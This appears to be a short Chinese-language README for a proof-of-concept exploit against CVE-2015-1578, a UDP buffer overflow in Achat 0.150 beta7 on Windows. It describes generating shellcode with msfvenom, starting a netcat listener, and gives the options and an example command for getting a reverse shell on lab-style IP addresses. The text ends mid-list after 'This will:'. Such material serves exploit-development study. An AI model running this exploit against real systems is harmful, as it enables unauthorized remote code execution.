这是一个针对 CVE-2015-1578 的概念验证利用程序,该漏洞是 Windows 上 Achat 0.150 beta7 中的一个缓冲区溢出漏洞。利用该漏洞可通过精心构造的 UDP 数据包导致远程代码执行。
此 PoC 旨在作为干净、简洁、结构良好的漏洞利用开发示例。它展示了:
msfvenom 动态生成 Shellcodemsfvenom(Metasploit 框架的一部分)rlwrap(用于增强 Netcat 的可用性)msfvenom 动态创建 Unicode 编码的有效载荷rlwrap nc 自动启动监听器-i <target_ip> 目标 IP 地址(必需)
-l, --lhost <listener_ip> 用于反弹 Shell 的本地主机 IP(必需)
-p, --lport <port> 用于反弹 Shell 的本地端口(必需)
--rport <port> 目标上的远程 UDP 端口(默认:9256)
python3 chatter.py -i 10.10.10.74 -l 10.10.16.7 -p 9393
这将: